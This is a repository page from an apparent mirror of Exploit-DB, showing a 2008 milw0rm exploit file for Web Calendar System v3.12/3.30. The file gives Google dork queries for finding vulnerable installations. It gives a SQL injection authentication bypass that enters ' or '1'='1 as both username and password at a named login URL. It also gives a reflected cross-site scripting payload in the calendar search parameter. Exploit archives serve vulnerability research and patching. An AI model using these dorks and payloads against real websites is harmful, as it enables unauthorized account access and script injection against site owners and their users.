bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7242.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

39 lines
No EOL
1.4 KiB
Text
Raw Blame History

000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000
[+] Script : Web Calendar System v 3.12/3.30
[+] Exploit Type : Multiple Exploits (XSS + remote bypass Exploit)
[+] Google Dork : intitle:Web Calendar system v 3.30 inurl:.asp
[+] Google Dork : intitle:Web Calendar system v 3.12 inurl:.asp
[+] Contact : blackbeard-sql@hotmail.fr
--//--> Exploit :
1) Remote Bypass Exploit :
http://[website]/[script]/db/agenda/calendar.asp?DoAction=USER&Change=LOGINFORM
username:' or '1'='1
password:' or '1'='1
2) Remote XSS exploit :
In simple words :
http://[website]/[script]/CALENDAR.ASP?DoAction=Calendar&View=Search&SText=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ]
# milw0rm.com [2008-11-27]
Reference in a new issue View git blame Copy permalink